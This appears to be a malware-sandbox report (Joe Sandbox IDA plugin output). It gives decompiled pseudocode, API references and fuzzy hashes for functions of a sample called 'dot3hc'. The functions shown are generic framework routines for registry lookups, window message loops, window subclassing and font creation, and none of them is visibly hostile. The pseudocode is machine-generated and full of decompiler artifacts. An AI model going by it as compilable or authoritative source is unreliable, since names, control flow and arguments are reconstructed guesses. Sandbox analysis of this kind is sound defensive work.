                                                      • Instruction ID: ea0c79ff68116504239c338cd84909263c11110d6238371cb65e95f2b4ede0f1
                                                      • Opcode Fuzzy Hash: b84e5eaf672f1bfb1190bcd0de862ae4c3f2647a4bdaa930b90debcdc623c7f8
                                                      • Instruction Fuzzy Hash: BA4148B1E10619EFCF11DFA4C845ADEBB79BF48B24F10811BF015AA290C7789A91CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 68%
                                                      			E00405591(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
                                                      				char _v4;
                                                      				intOrPtr _v12;
                                                      				char* _v16;
                                                      				void* _v20;
                                                      				char* _v24;
                                                      				char _v28;
                                                      				long _v32;
                                                      				char _v36;
                                                      				char _v272;
                                                      				char _v280;
                                                      				intOrPtr _v292;
                                                      				void* __ebp;
                                                      				signed int _t40;
                                                      				char _t44;
                                                      				void* _t47;
                                                      				void* _t54;
                                                      				char* _t61;
                                                      				void* _t77;
                                                      				void* _t80;
                                                      				void* _t81;
                                                      				intOrPtr _t94;
                                                      				void* _t98;
                                                      				void* _t100;
                                                      				void* _t101;
                                                      				char* _t104;
                                                      
                                                      				_t95 = __edx;
                                                      				_t81 = __ecx;
                                                      				_t79 = __ebx;
                                                      				_t104 =  &_v272;
                                                      				_t40 =  *0x443590; // 0x8ffedb05
                                                      				_a264 = _t40 ^ _t104;
                                                      				_push(0x18);
                                                      				E0041F6EA(E00431D73, __ebx, __edi, __esi);
                                                      				_t100 = __ecx;
                                                      				_v20 = 0;
                                                      				_v32 = 0;
                                                      				_t44 = E004052F2(__ecx, __edx);
                                                      				_v28 = _t44;
                                                      				if(_t44 != 0) {
                                                      					do {
                                                      						__eax =  &_v28;
                                                      						_push(__eax);
                                                      						__ecx = __esi;
                                                      						E00405303();
                                                      						__eflags = __eax - __edi;
                                                      						if(__eax != __edi) {
                                                      							__edx =  *__eax;
                                                      							__ecx = __eax;
                                                      							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
                                                      						}
                                                      						__eflags = _v28 - __edi;
                                                      					} while (_v28 != __edi);
                                                      				}
                                                      				__eflags =  *(_t100 + 0x54);
                                                      				if( *(_t100 + 0x54) == 0) {
                                                      					L15:
                                                      					 *[fs:0x0] = _v12;
                                                      					_pop(_t98);
                                                      					_pop(_t101);
                                                      					_pop(_t80);
                                                      					_t47 = E0041E5DF(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
                                                      					__eflags =  &_a268;
                                                      					return _t47;
                                                      				} else {
                                                      					__eflags =  *(_t100 + 0x68);
                                                      					__eflags = 0 |  *(_t100 + 0x68) != 0x00000000;
                                                      					if(__eflags != 0) {
                                                      						_push("Software\\");
                                                      						E00403667(_t79,  &_v16, 0, _t100, __eflags);
                                                      						_v4 = 0;
                                                      						E0040352C( &_v16,  *(_t100 + 0x54));
                                                      						_push(0x435478);
                                                      						_push( &_v16);
                                                      						_push( &_v36);
                                                      						_t54 = E0040541E(_t79, 0, _t100, __eflags);
                                                      						_push( *(_t100 + 0x68));
                                                      						_v4 = 1;
                                                      						_push(_t54);
                                                      						_push( &_v24);
                                                      						E0040541E(_t79, 0, _t100, __eflags);
                                                      						_v4 = 3;
                                                      						E00403036(_v36 + 0xfffffff0, _t95);
                                                      						_push( &_v24);
                                                      						_push(0x80000001);
                                                      						E00405482(_t79, 0, 0x80000001, __eflags);
                                                      						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
                                                      						__eflags = _t61;
                                                      						if(_t61 == 0) {
                                                      							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
                                                      							if(__eflags == 0) {
                                                      								_push( &_v16);
                                                      								_push(0x80000001);
                                                      								E00405482(_t79, 0, 0x80000001, __eflags);
                                                      							}
                                                      							RegCloseKey(_v20);
                                                      						}
                                                      						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
                                                      						E00403036( &(_v24[0xfffffffffffffff0]), _t95);
                                                      						__eflags =  &(_v16[0xfffffffffffffff0]);
                                                      						E00403036( &(_v16[0xfffffffffffffff0]), _t95);
                                                      						goto L15;
                                                      					} else {
                                                      						_push(_t104);
                                                      						_push(_t81);
                                                      						_t6 =  &_v280; // 0x4423e8
                                                      						_v280 = 0x442480;
                                                      						E0041F7F4(_t6, 0x43c590);
                                                      						asm("int3");
                                                      						_push(4);
                                                      						E0041F6EA(E00431BFC, _t79, 0, _t100);
                                                      						_t94 = E0040F014(0x104);
                                                      						_v292 = _t94;
                                                      						_t77 = 0;
                                                      						_v280 = 0;
                                                      						if(_t94 != 0) {
                                                      							_t77 = E0040D519(_t94);
                                                      						}
                                                      						return E0041F7C2(_t77);
                                                      					}
                                                      				}
                                                      			}





























                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 004055B0
                                                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0040566C
                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 00405683
                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 0040569D
                                                      • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 004056AF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CloseEnumH_prolog3OpenQueryValue
                                                      • String ID: Software\
                                                      • API String ID: 3878845136-964853688
                                                      • Opcode ID: f023182a653509516668c61ee528ee225d48264462ccecaf34031b8ebcf169be
                                                      • Instruction ID: c7b39df0023e7795f59702957f2174eef86f6ceff4bf1e696be6c37735e09762
                                                      • Opcode Fuzzy Hash: f023182a653509516668c61ee528ee225d48264462ccecaf34031b8ebcf169be
                                                      • Instruction Fuzzy Hash: E141AB31900509ABCB21EBA5CC41AFFBBB9EF48314F10093BE551F22D1DB799A45CB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E0040982D(intOrPtr* __ecx, signed int _a4) {
                                                      				struct HWND__* _v4;
                                                      				struct tagMSG* _v8;
                                                      				int _v12;
                                                      				int _v16;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				struct HWND__* _t42;
                                                      				struct tagMSG* _t43;
                                                      				signed int _t45;
                                                      				void* _t48;
                                                      				void* _t50;
                                                      				int _t53;
                                                      				long _t56;
                                                      				signed int _t62;
                                                      				intOrPtr* _t64;
                                                      				intOrPtr* _t67;
                                                      				void* _t68;
                                                      
                                                      				_t63 = __ecx;
                                                      				_t62 = 1;
                                                      				_t67 = __ecx;
                                                      				_v12 = 1;
                                                      				_v16 = 0;
                                                      				if((_a4 & 0x00000004) == 0 || (E0040C981(__ecx) & 0x10000000) != 0) {
                                                      					_t62 = 0;
                                                      				}
                                                      				_t42 = GetParent( *(_t67 + 0x20));
                                                      				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
                                                      				_v4 = _t42;
                                                      				_t43 = E00404C27(0);
                                                      				_t68 = UpdateWindow;
                                                      				_v8 = _t43;
                                                      				while(1) {
                                                      					L14:
                                                      					_t73 = _v12;
                                                      					if(_v12 == 0) {
                                                      						goto L15;
                                                      					}
                                                      					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
                                                      					if(__eflags != 0) {
                                                      						while(1) {
                                                      							L15:
                                                      							_t45 = E0040501F(_t63, 0, _t67, _t73);
                                                      							if(_t45 == 0) {
                                                      								break;
                                                      							}
                                                      							if(_t62 != 0) {
                                                      								_t53 = _v8->message;
                                                      								if(_t53 == 0x118 || _t53 == 0x104) {
                                                      									E0040CA4F(_t67, 1);
                                                      									UpdateWindow( *(_t67 + 0x20));
                                                      									_t62 = 0;
                                                      								}
                                                      							}
                                                      							_t64 = _t67;
                                                      							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
                                                      							_t79 = _t48;
                                                      							if(_t48 == 0) {
                                                      								_t39 = _t67 + 0x3c;
                                                      								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
                                                      								__eflags =  *_t39;
                                                      								return  *((intOrPtr*)(_t67 + 0x44));
                                                      							} else {
                                                      								_t50 = E00404F39(_t62, _t64, 0, _t67, _t68, _t79, _v8);
                                                      								_pop(_t63);
                                                      								if(_t50 != 0) {
                                                      									_v12 = 1;
                                                      									_v16 = 0;
                                                      								}
                                                      								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
                                                      									continue;
                                                      								} else {
                                                      									goto L14;
                                                      								}
                                                      							}
                                                      						}
                                                      						_push(0);
                                                      						E00403CEC();
                                                      						return _t45 | 0xffffffff;
                                                      					}
                                                      					__eflags = _t62;
                                                      					if(_t62 != 0) {
                                                      						_t63 = _t67;
                                                      						E0040CA4F(_t67, 1);
                                                      						UpdateWindow( *(_t67 + 0x20));
                                                      						_t62 = 0;
                                                      						__eflags = 0;
                                                      					}
                                                      					__eflags = _a4 & 0x00000001;
                                                      					if((_a4 & 0x00000001) == 0) {
                                                      						__eflags = _v4;
                                                      						if(_v4 != 0) {
                                                      							__eflags = _v16;
                                                      							if(_v16 == 0) {
                                                      								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
                                                      							}
                                                      						}
                                                      					}
                                                      					__eflags = _a4 & 0x00000002;
                                                      					if(__eflags != 0) {
                                                      						L13:
                                                      						_v12 = 0;
                                                      						continue;
                                                      					} else {
                                                      						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
                                                      						_v16 = _v16 + 1;
                                                      						__eflags = _t56;
                                                      						if(__eflags != 0) {
                                                      							continue;
                                                      						}
                                                      						goto L13;
                                                      					}
                                                      				}
                                                      				goto L15;
                                                      			}























                                                      APIs
                                                      • GetParent.USER32(?), ref: 0040985B
                                                      • PeekMessageA.USER32 ref: 00409882
                                                      • UpdateWindow.USER32(?), ref: 0040989C
                                                      • SendMessageA.USER32(?,00000121,00000000,?), ref: 004098C0
                                                      • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 004098DA
                                                      • UpdateWindow.USER32(?), ref: 00409920
                                                      • PeekMessageA.USER32 ref: 00409954
                                                        • Part of subcall function 0040C981: GetWindowLongA.USER32 ref: 0040C98C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Message$Window$PeekSendUpdate$LongParent
                                                      • String ID:
                                                      • API String ID: 2853195852-0
                                                      • Opcode ID: 5b0aaa6aca744f7147385050ea3bf78ee9ed67bc114c1dd5bc6550dd72ee26d1
                                                      • Instruction ID: 3594d42317ffdf77eda035bd5be05eb9f6962faab1b0a5bda36925cf630a621a
                                                      • Opcode Fuzzy Hash: 5b0aaa6aca744f7147385050ea3bf78ee9ed67bc114c1dd5bc6550dd72ee26d1
                                                      • Instruction Fuzzy Hash: 5B41BF712147419BDB21AF26CC84A2BBBE4FFC1B54F04493EF481A12E2D779DD04DA1A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 79%
                                                      			E00404592(int __ebx, long __ecx, struct HWND__* __edi) {
                                                      				long _v4;
                                                      				char _v28;
                                                      				intOrPtr _v40;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				long _t20;
                                                      				long _t21;
                                                      				struct HWND__* _t22;
                                                      				long _t23;
                                                      				struct HWND__* _t24;
                                                      				long _t25;
                                                      				struct HWND__* _t26;
                                                      				void* _t33;
                                                      				void* _t35;
                                                      				long _t39;
                                                      				long _t41;
                                                      				intOrPtr _t43;
                                                      				struct HWND__* _t47;
                                                      				struct HWND__* _t49;
                                                      				long _t51;
                                                      				long _t53;
                                                      
                                                      				_t46 = __edi;
                                                      				_t39 = __ecx;
                                                      				_t37 = __ebx;
                                                      				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
                                                      					_t51 = E00403ED6();
                                                      					__eflags = _t51;
                                                      					if(_t51 != 0) {
                                                      						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
                                                      						__eflags = _t20;
                                                      						_t41 = _t51;
                                                      						_pop(_t52);
                                                      						if(_t20 != 0) {
                                                      							_t53 = _t41;
                                                      							_t21 =  *(_t53 + 0x64);
                                                      							__eflags = _t21;
                                                      							if(_t21 == 0) {
                                                      								_pop(_t52);
                                                      								goto L12;
                                                      							} else {
                                                      								__eflags = _t21 - 0x3f107;
                                                      								if(__eflags != 0) {
                                                      									_t35 = E0040DB94(__ebx, __edi, _t53, __eflags);
                                                      									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
                                                      								}
                                                      								return _t21;
                                                      							}
                                                      						} else {
                                                      							L12:
                                                      							_push(_t41);
                                                      							_push(_t37);
                                                      							_push(0);
                                                      							_push(_t52);
                                                      							_push(_t46);
                                                      							_v4 = _t41;
                                                      							_t22 = GetCapture();
                                                      							_t51 = SendMessageA;
                                                      							_t37 = 0x365;
                                                      							while(1) {
                                                      								_t47 = _t22;
                                                      								__eflags = _t47;
                                                      								if(_t47 == 0) {
                                                      									break;
                                                      								}
                                                      								_t23 = SendMessageA(_t47, _t37, 0, 0);
                                                      								__eflags = _t23;
                                                      								if(__eflags != 0) {
                                                      									L27:
                                                      									return _t23;
                                                      								} else {
                                                      									_t22 = E0040AF20(_t41, _t47, __eflags, _t47);
                                                      									continue;
                                                      								}
                                                      								goto L33;
                                                      							}
                                                      							_t24 = GetFocus();
                                                      							while(1) {
                                                      								_t46 = _t24;
                                                      								__eflags = _t46;
                                                      								if(_t46 == 0) {
                                                      									break;
                                                      								}
                                                      								_t23 = SendMessageA(_t46, _t37, 0, 0);
                                                      								__eflags = _t23;
                                                      								if(__eflags != 0) {
                                                      									goto L27;
                                                      								} else {
                                                      									_t24 = E0040AF20(_t41, _t46, __eflags, _t46);
                                                      									continue;
                                                      								}
                                                      								goto L33;
                                                      							}
                                                      							_t39 = _v4;
                                                      							_t25 = E0040AF65(_t37, _t39, _t46);
                                                      							__eflags = _t25;
                                                      							if(_t25 != 0) {
                                                      								_t26 = GetLastActivePopup( *(_t25 + 0x20));
                                                      								while(1) {
                                                      									_t49 = _t26;
                                                      									__eflags = _t49;
                                                      									_push(0);
                                                      									if(_t49 == 0) {
                                                      										break;
                                                      									}
                                                      									_t23 = SendMessageA(_t49, _t37, 0, ??);
                                                      									__eflags = _t23;
                                                      									if(__eflags == 0) {
                                                      										_t26 = E0040AF20(_t39, _t49, __eflags, _t49);
                                                      										continue;
                                                      									}
                                                      									goto L27;
                                                      								}
                                                      								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
                                                      								goto L27;
                                                      							} else {
                                                      								goto L1;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						L1:
                                                      						_push(0);
                                                      						_push(_t39);
                                                      						_t2 =  &_v28; // 0x4423e8
                                                      						_v28 = 0x442480;
                                                      						E0041F7F4(_t2, 0x43c590);
                                                      						asm("int3");
                                                      						_push(4);
                                                      						E0041F6EA(E00431BFC, _t37, _t46, _t51);
                                                      						_t43 = E0040F014(0x104);
                                                      						_v40 = _t43;
                                                      						_t33 = 0;
                                                      						_v28 = 0;
                                                      						if(_t43 != 0) {
                                                      							_t33 = E0040D519(_t43);
                                                      						}
                                                      						return E0041F7C2(_t33);
                                                      					}
                                                      				} else {
                                                      					__eflags = __eax - 0x3f107;
                                                      					if(__eax != 0x3f107) {
                                                      						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
                                                      					}
                                                      					return __eax;
                                                      				}
                                                      				L33:
                                                      			}

























                                                      APIs
                                                      • GetCapture.USER32 ref: 0040F951
                                                      • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0040F96A
                                                      • GetFocus.USER32 ref: 0040F97C
                                                      • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0040F988
                                                      • GetLastActivePopup.USER32(?), ref: 0040F9AF
                                                      • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0040F9BA
                                                      • SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 0040F9DE
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                      • String ID:
                                                      • API String ID: 3219385341-0
                                                      • Opcode ID: 2cde3028f60a794a7c700ba65a38728bb5095e0c535c8637e969885bad06cfd8
                                                      • Instruction ID: 6bbcefccedb64782f514be833ccaebf9a4cac9621966bdcb030a22abc8cdc0d5
                                                      • Opcode Fuzzy Hash: 2cde3028f60a794a7c700ba65a38728bb5095e0c535c8637e969885bad06cfd8
                                                      • Instruction Fuzzy Hash: 9C31D5B1700215BBDA316B25DC84F7B76ACAB85798B11003BF501F76D0CB3DEC0596AA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00409DC5(intOrPtr* __ecx) {
                                                      				struct HWND__* _v40;
                                                      				struct HWND__* _v44;
                                                      				intOrPtr _v48;
                                                      				void* _v52;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				long _t43;
                                                      				struct HWND__* _t48;
                                                      				long _t61;
                                                      				intOrPtr* _t63;
                                                      				signed int _t64;
                                                      				void* _t69;
                                                      				intOrPtr _t71;
                                                      				intOrPtr* _t72;
                                                      
                                                      				_t72 = __ecx;
                                                      				_t69 = E00404C1E();
                                                      				if(_t69 != 0) {
                                                      					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
                                                      						 *((intOrPtr*)(_t69 + 0x20)) = 0;
                                                      					}
                                                      					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
                                                      						 *((intOrPtr*)(_t69 + 0x24)) = 0;
                                                      					}
                                                      				}
                                                      				_t63 =  *((intOrPtr*)(_t72 + 0x48));
                                                      				if(_t63 != 0) {
                                                      					 *((intOrPtr*)( *_t63 + 0x50))();
                                                      					 *((intOrPtr*)(_t72 + 0x48)) = 0;
                                                      				}
                                                      				_t64 =  *(_t72 + 0x4c);
                                                      				if(_t64 != 0) {
                                                      					 *((intOrPtr*)( *_t64 + 4))(1);
                                                      				}
                                                      				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
                                                      				_t83 =  *(_t72 + 0x3c) & 1;
                                                      				if(( *(_t72 + 0x3c) & 1) != 0) {
                                                      					_t71 =  *((intOrPtr*)(E0040DBC7(1, _t64, _t69, _t72, _t83) + 0x3c));
                                                      					if(_t71 != 0) {
                                                      						_t85 =  *(_t71 + 0x20);
                                                      						if( *(_t71 + 0x20) != 0) {
                                                      							E0041F330(_t71,  &_v52, 0, 0x30);
                                                      							_t48 =  *(_t72 + 0x20);
                                                      							_v44 = _t48;
                                                      							_v40 = _t48;
                                                      							_v52 = 0x28;
                                                      							_v48 = 1;
                                                      							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
                                                      						}
                                                      					}
                                                      				}
                                                      				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
                                                      				E00409BF3(_t61, _t72, GetWindowLongA, _t85);
                                                      				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
                                                      					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
                                                      					if(_t43 != 0) {
                                                      						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
                                                      					}
                                                      				}
                                                      				E00409D11(_t61, _t72);
                                                      				return  *((intOrPtr*)( *_t72 + 0x114))();
                                                      			}




















                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend_memset
                                                      • String ID: (
                                                      • API String ID: 2997958587-3887548279
                                                      • Opcode ID: 4fc80bdcaf400218dc3c80102da1bb3e0474b3a793b6c10b4ee9a8a9b85137e4
                                                      • Instruction ID: 9e45313b090639f1ad71dca0b70a2556c303530e875c3b0a022525267220ac75
                                                      • Opcode Fuzzy Hash: 4fc80bdcaf400218dc3c80102da1bb3e0474b3a793b6c10b4ee9a8a9b85137e4
                                                      • Instruction Fuzzy Hash: 7E3190716003109FDB20EFA9C884A6FB7B5BF88315B15053EE545A76D2DB39EC40CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E00412822(signed int __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				intOrPtr _t49;
                                                      				signed int _t60;
                                                      				signed int _t64;
                                                      				signed int _t67;
                                                      				signed int _t80;
                                                      				signed int _t86;
                                                      				intOrPtr* _t90;
                                                      				void* _t91;
                                                      
                                                      				_t74 = __ebx;
                                                      				_push(0x80);
                                                      				E0041F753(E00432C16, __ebx, __edi, __esi);
                                                      				_t49 =  *((intOrPtr*)(_t91 + 8));
                                                      				_t90 = __ecx;
                                                      				 *((intOrPtr*)(_t91 - 0x50)) = 0;
                                                      				 *((intOrPtr*)(_t91 - 0x54)) = 0x4361e8;
                                                      				 *(_t91 - 4) = 0;
                                                      				if(_t49 == 0 ||  *(_t49 + 4) == 0) {
                                                      					_t6 = _t91 - 0x54; // 0x4361e8
                                                      					if(E00411C82(_t6, 0x11) != 0) {
                                                      						L5:
                                                      						_t9 = _t91 - 0x54; // 0x4361e8
                                                      						_t49 = _t9;
                                                      						goto L6;
                                                      					} else {
                                                      						_t7 = _t91 - 0x54; // 0x4361e8
                                                      						if(E00411C82(_t7, 0xd) != 0) {
                                                      							goto L5;
                                                      						} else {
                                                      							 *((intOrPtr*)(_t90 + 0x64)) = 0;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					L6:
                                                      					GetObjectA( *(_t49 + 4), 0x3c, _t91 - 0x4c);
                                                      					_push(_t91 - 0x30);
                                                      					 *(_t91 - 0x78) = 0x20;
                                                      					E004036AB(_t74, _t91 - 0x58, 0, _t90, __eflags);
                                                      					 *((intOrPtr*)(_t91 - 0x74)) =  *((intOrPtr*)(_t91 - 0x58));
                                                      					 *((short*)(_t91 - 0x68)) =  *((intOrPtr*)(_t91 - 0x3c));
                                                      					 *(_t91 - 0x66) =  *(_t91 - 0x35) & 0x000000ff;
                                                      					 *(_t91 - 0x64) =  *(_t91 - 0x38) & 0x000000ff;
                                                      					 *(_t91 - 0x60) =  *(_t91 - 0x37) & 0x000000ff;
                                                      					 *(_t91 - 0x5c) =  *(_t91 - 0x36) & 0x000000ff;
                                                      					_t60 =  *(_t91 - 0x4c);
                                                      					__eflags = _t60;
                                                      					 *(_t91 - 4) = 1;
                                                      					_t74 = _t60;
                                                      					if(__eflags < 0) {
                                                      						_t74 =  ~_t60;
                                                      					}
                                                      					E0040E75E(_t74, _t91 - 0x8c, 0, _t90, __eflags);
                                                      					 *(_t91 - 4) = 2;
                                                      					_t80 = GetDeviceCaps( *(_t91 - 0x84), 0x5a);
                                                      					_t64 = _t74 * 0xafc80;
                                                      					asm("cdq");
                                                      					_t86 = _t64 % _t80;
                                                      					_t90 = _t90 + 0x64;
                                                      					 *((intOrPtr*)(_t91 - 0x6c)) = 0;
                                                      					 *(_t91 - 0x70) = _t64 / _t80;
                                                      					E0040ED13(_t90);
                                                      					_t67 = _t91 - 0x78;
                                                      					__imp__#420(_t67, 0x439480, _t90,  *((intOrPtr*)(_t90 + 0x20)));
                                                      					__eflags = _t67;
                                                      					if(__eflags < 0) {
                                                      						 *_t90 = 0;
                                                      					}
                                                      					 *(_t91 - 4) = 1;
                                                      					E0040E7B2(_t74, _t91 - 0x8c, 0, _t90, __eflags);
                                                      					__eflags =  *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0;
                                                      					E00403036( *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0, _t86);
                                                      				}
                                                      				 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
                                                      				_t45 = _t91 - 0x54; // 0x4361e8
                                                      				 *((intOrPtr*)(_t91 - 0x54)) = 0x4361d8;
                                                      				E0040E956(_t45);
                                                      				return E0041F7D6(_t74, 0, _t90);
                                                      			}

                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 0041282C
                                                      • GetObjectA.GDI32(?,0000003C,?), ref: 0041287E
                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 004128EE
                                                      • OleCreateFontIndirect.OLEAUT32(00000020,00439480), ref: 0041291A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                      • String ID: $aC
                                                      • API String ID: 2429671754-2144110735
                                                      • Opcode ID: 3184c387fc046288f6b644fc771ddd44e823c9d317aa9a87c4637d74b33b126c
                                                      • Instruction ID: e04894aa077b9c1b9b57ffa01989e5e100f7f590183dedbf99927f803ccce2ea
                                                      • Opcode Fuzzy Hash: 3184c387fc046288f6b644fc771ddd44e823c9d317aa9a87c4637d74b33b126c
                                                      • Instruction Fuzzy Hash: 00418D74E012499EDB10DFE6C945ADCFBF4AF58304F10816BE455E72A2E7B88A84CB14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 77%
                                                      			E00404ABD(void* __edx, signed int _a116, char _a120) {
                                                      				void _v12;
                                                      				char _v16;
                                                      				signed int _v20;
                                                      				int _v24;
                                                      				char _v124;
                                                      				char _v172;
                                                      				intOrPtr _v184;
                                                      				int __ebx;
                                                      				signed int __edi;
                                                      				signed int __esi;
                                                      				signed int __ebp;
                                                      				signed int _t26;
                                                      				unsigned int _t28;
                                                      				intOrPtr _t35;
                                                      				unsigned int _t39;
                                                      				intOrPtr _t40;
                                                      				void* _t42;
                                                      				void* _t43;
                                                      				signed int _t45;
                                                      
                                                      				_t45 =  &_v124;
                                                      				_t26 =  *0x443590; // 0x8ffedb05
                                                      				_a116 = _t26 ^ _t45;
                                                      				_push(_t43);
                                                      				_push(_t42);
                                                      				_t28 = GetMenuCheckMarkDimensions();
                                                      				_t38 = _t28;
                                                      				_t39 = _t28 >> 0x10;
                                                      				_v24 = _t39;
                                                      				if(_t28 <= 4 || __ecx <= 5) {
                                                      					_push(_t45);
                                                      					_push(_t39);
                                                      					_t4 =  &_v172; // 0x4423e8
                                                      					_v172 = 0x442480;
                                                      					E0041F7F4(_t4, 0x43c590);
                                                      					asm("int3");
                                                      					_push(4);
                                                      					E0041F6EA(E00431BFC, _t38, _t42, _t43);
                                                      					_t40 = E0040F014(0x104);
                                                      					_v184 = _t40;
                                                      					_t35 = 0;
                                                      					_v172 = 0;
                                                      					if(_t40 != 0) {
                                                      						_t35 = E0040D519(_t40);
                                                      					}
                                                      					return E0041F7C2(_t35);
